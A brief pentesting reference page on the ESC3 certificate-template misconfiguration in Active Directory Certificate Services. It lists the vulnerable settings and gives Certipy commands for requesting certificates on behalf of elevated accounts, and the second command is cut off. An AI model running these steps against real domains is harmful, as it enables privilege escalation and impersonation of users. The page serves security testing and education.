ESC3

TL;DR
ESC3 allows you to request a certificate that can be used to request another certificate on behalf of any user and use that certificate for client authentication using Kerberos.

A template is vulnerable to ESC3 when a certificate template defines the Certificate Request Agent EKU that allows for requesting other certificate templates on behalf of other principals.

A certificate template with the following configuration is vulnerable to ESC3:

The Enterprise CA allows low-privileged users enrollment rights.
Manager approval is disabled.
No authorized signatures are required.
An overly permissive certificate template security descriptor allows certificate enrollment rights to low-privileged users.
The certificate template defines the Certificate Request Agent EKU.

Exploit

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux (Attacker)

# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]

# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -u

PreviousESC2 NextESC4

Last updated 1 year ago